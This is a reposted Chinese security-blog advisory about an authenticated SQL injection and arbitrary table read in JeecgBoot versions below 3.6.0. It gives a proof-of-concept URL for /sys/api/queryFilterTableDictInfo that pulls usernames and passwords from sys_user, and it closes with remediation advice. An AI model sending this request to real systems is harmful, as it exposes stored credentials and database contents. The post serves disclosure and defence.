JeecgBoot小于3.6.0版本存在SQL注入漏洞

admin 2024年11月24日11:47:14评论20 views字数 1023阅读3分24秒阅读模式

接口/sys/api/queryFilterTableDictInfo存在SQL注入漏洞

通过审计jeecgboot 3.6.0源代码,发现jeecgboot表接口存在SQL注入漏洞,通过构造表名和字段名,直接获取到数据库中的数据。

漏洞代码:

参数table、text、code可以直接带入到前端url,查询出数据库中任意数据表的数据。

JeecgBoot小于3.6.0版本存在SQL注入漏洞

JeecgBoot小于3.6.0版本存在SQL注入漏洞

构造漏洞url: http://192.168.10.100/jeecg-boot/sys/api/queryFilterTableDictInfo?table=sys_user&text=username&code=password&filterSql=&pageSize=1000&pageNo=1

漏洞复现:登录后使用用户token,访问http://192.168.10.100/jeecg-boot/sys/api/queryFilterTableDictInfo?table=sys_user&text=username&code=password&filterSql=&pageSize=1000&pageNo=1,获取了数据库中sys_user表所有的用户名和密码,修改table、text和code参数的值可以获取到onenext_init库中所有表的信息,导致数据库敏感信息泄露。

利用前提:获取到token

漏洞接口:/sys/api/queryFilterTableDictInfo

漏洞POC:

?table=sys_user&text=username&code=password&filterSql=&pageSize=1000&pageNo=1

table参数带入mysql表查询,返回的错误信息表onenext_init.mysql不存在,暴露了当前库名为onenext_init,在已知表字段的情况下,能查询onenext_init库中所有表的信息。

JeecgBoot小于3.6.0版本存在SQL注入漏洞

获取了sys_user表中的用户名和密码

JeecgBoot小于3.6.0版本存在SQL注入漏洞

查询tax_task表的数据

JeecgBoot小于3.6.0版本存在SQL注入漏洞

整改建议:前端用户可控参数不能直接带入到用户可控参数table中进行查询,或禁用前端用户对/sys/api/queryFilterTableDictInfo接口访问。

来源:【JeecgBoot小于3.6.0版本存在SQL注入漏洞 - FreeBuf网络安全行业门户】,感谢【howardkb】

原文始发于微信公众号(船山信安):JeecgBoot小于3.6.0版本存在SQL注入漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月24日11:47:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   JeecgBoot小于3.6.0版本存在SQL注入漏洞https://cn-sec.com/archives/3430315.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息